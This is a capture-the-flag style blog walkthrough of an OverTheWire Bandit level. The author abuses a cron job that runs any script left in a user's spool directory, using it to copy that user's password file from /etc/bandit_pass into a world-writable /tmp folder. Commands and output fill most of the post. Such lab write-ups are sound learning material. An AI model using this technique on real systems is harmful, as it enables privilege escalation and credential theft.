Exploiting Cron-Jobs
In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.
Another day, another server. We have very limited access on our current user bandit23, and are tasked with gaining access to user bandit24.
One directory we can access, however, is /etc/cron.d. Unlike /var/spool/cron, files stored in /etc/cron.d are effectively root-owned scripts.
There does indeed happen to be an active crontab file in this directory:
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit24
And taking a look into this script we can see that this crontab is executing a bash script held in another directory:
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
This bash script is executed by the root-owned cronjob every minute, as denoted by the cron scheduler.
Let's take a look at this bash script:
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
Now what this script appears to be doing is entering a defined directory, executing all scripts within that directory, and then deleting them. This works nicely for us!
If this cronjob executes a bash script, and that bash script executes other bash scripts...well then I just need to write a bash script.
I'll start with making my own directory where I have ownership:
bandit23@bandit:~$ mkdir /tmp/skyenet
bandit23@bandit:~$ chmod 777 /tmp/skyenet
We were shown earlier in the series that there is a directory /etc/bandit_pass/ where user passwords are stored, with the file permissions restricted to each relevant user. If bandit24 will be executing this bash script, then we can have them fetch their own password and share it with us.
And so that's what I will do!
Creating our script as so will print the content's of bandit24's password file, and output to a new .txt file within our own directory:
bandit23@bandit:~$ touch /tmp/skyenet/script.sh
bandit23@bandit:~$ cat /tmp/skyenet/script.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > tmp/skyenet/password.txt
Now we can make our script executable, and deviously place this in bandit24's /var/spool/ directory:
bandit23@bandit:~$ chmod +x /tmp/skyenet/script.sh
bandit23@bandit:~$ cp /tmp/skyenet/script.sh /var/spool/bandit24/
As soon as the cronjob next runs, our script will be executed and a .txt will hopefully appear in our directory:
bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh
Not yet...
bandit23@bandit:/tmp/skyenet$ ls
script.sh
Nearly there...
bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh password.txt
bandit23@bandit:/tmp/skyenet$ cat password.txt
UoMYTmg6gzctqArfrBFHyQXwOmw1IohZ
Success! We have our password, and can proceed to SSH into user bandit24.
This has been a quick look into exploiting cronjobs and user permissions.
Thank you for reading!